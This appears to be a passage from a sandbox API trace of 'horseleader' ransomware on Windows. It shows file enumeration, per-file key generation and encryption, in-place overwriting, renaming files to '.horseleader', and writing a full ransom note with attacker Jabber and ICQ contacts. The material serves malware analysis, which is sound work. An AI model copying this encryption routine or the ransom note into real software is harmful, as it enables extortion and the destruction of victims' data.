lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0250.761] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0250.761] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033") returned 67 [0250.761] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0250.761] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0250.761] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.761] GetProcessHeap () returned 0x780000 [0250.762] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*") returned 69 [0250.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.762] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\.") returned 69 [0250.762] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.762] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeeeb5310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeeeb5310, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, cFileName="..", cAlternateFileName="")) returned 1 [0250.762] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.762] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\..") returned 70 [0250.763] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.763] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.763] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, cFileName="MSOSVINT.DLL", cAlternateFileName="")) returned 1 [0250.763] lstrcmpiW (lpString1="MSOSVINT.DLL", lpString2="Windows") returned -1 [0250.763] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned 80 [0250.763] StrStrIW (lpFirst="MSOSVINT.DLL", lpSrch=".horseleader") returned 0x0 [0250.763] lstrcmpW (lpString1="MSOSVINT.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.763] lstrcmpW (lpString1="MSOSVINT.DLL", lpString2="_uninstalling_.png") returned 1 [0250.763] lstrlenW (lpString=".testttjffg") returned 11 [0250.763] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL", lpSrch=".testttjffg") returned 0x0 [0250.763] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.763] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.765] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL") returned 80 [0250.765] StrStrW (lpFirst="MSOSVINT.DLL", lpSrch=".txt") returned 0x0 [0250.765] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=10632) returned 1 [0250.765] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2988, lpOverlapped=0x0) returned 1 [0250.767] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd678, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.767] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2988, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2988, lpOverlapped=0x0) returned 1 [0250.768] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.768] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.771] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.771] CloseHandle (hObject=0x1a4) returned 1 [0250.772] GetProcessHeap () returned 0x780000 [0250.772] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.772] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.horseleader") returned 92 [0250.772] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\MSOSVINT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\msosvint.dll.horseleader")) returned 1 [0250.773] GetProcessHeap () returned 0x780000 [0250.773] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.773] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca8c600, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbca8c600, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x2988, dwReserved0=0xdcd6045c, dwReserved1=0xb2bd2b59, cFileName="MSOSVINT.DLL", cAlternateFileName="")) returned 0 [0250.773] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0250.773] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\#Decrypt#.txt") returned 81 [0250.773] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.774] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.774] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0250.775] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.775] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0250.776] CloseHandle (hObject=0x158) returned 1 [0250.776] GetProcessHeap () returned 0x780000 [0250.776] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.776] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xaf88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOSV.DLL", cAlternateFileName="")) returned 1 [0250.776] lstrcmpiW (lpString1="MSOSV.DLL", lpString2="Windows") returned -1 [0250.776] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned 72 [0250.776] StrStrIW (lpFirst="MSOSV.DLL", lpSrch=".horseleader") returned 0x0 [0250.776] lstrcmpW (lpString1="MSOSV.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.776] lstrcmpW (lpString1="MSOSV.DLL", lpString2="_uninstalling_.png") returned 1 [0250.776] lstrlenW (lpString=".testttjffg") returned 11 [0250.776] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL", lpSrch=".testttjffg") returned 0x0 [0250.776] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0250.776] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0250.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0250.777] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL") returned 72 [0250.777] StrStrW (lpFirst="MSOSV.DLL", lpSrch=".txt") returned 0x0 [0250.777] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=44936) returned 1 [0250.777] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.780] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.780] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.781] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.782] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.782] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0250.782] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf88, lpOverlapped=0x0) returned 1 [0250.782] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff078, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.782] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf88, lpOverlapped=0x0) returned 1 [0250.782] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.783] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0250.783] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0250.783] CloseHandle (hObject=0x158) returned 1 [0250.783] GetProcessHeap () returned 0x780000 [0250.783] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.783] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.horseleader") returned 84 [0250.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\MSOSV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\msosv.dll.horseleader")) returned 1 [0250.784] GetProcessHeap () returned 0x780000 [0250.784] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0250.784] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdd9f300, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x6a02ad50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbdd9f300, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0xaf88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOSV.DLL", cAlternateFileName="")) returned 0 [0250.784] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0250.785] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\#Decrypt#.txt") returned 76 [0250.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Folders\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\web folders\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0250.785] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.785] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0250.787] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.787] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0250.787] CloseHandle (hObject=0x21c) returned 1 [0250.787] GetProcessHeap () returned 0x780000 [0250.787] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.787] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 1 [0250.787] lstrcmpiW (lpString1="Web Server Extensions", lpString2="Windows") returned -1 [0250.787] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions") returned 72 [0250.787] lstrcmpW (lpString1="Web Server Extensions", lpString2=".") returned 1 [0250.787] lstrcmpW (lpString1="Web Server Extensions", lpString2="..") returned 1 [0250.788] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.788] GetProcessHeap () returned 0x780000 [0250.788] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.788] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: 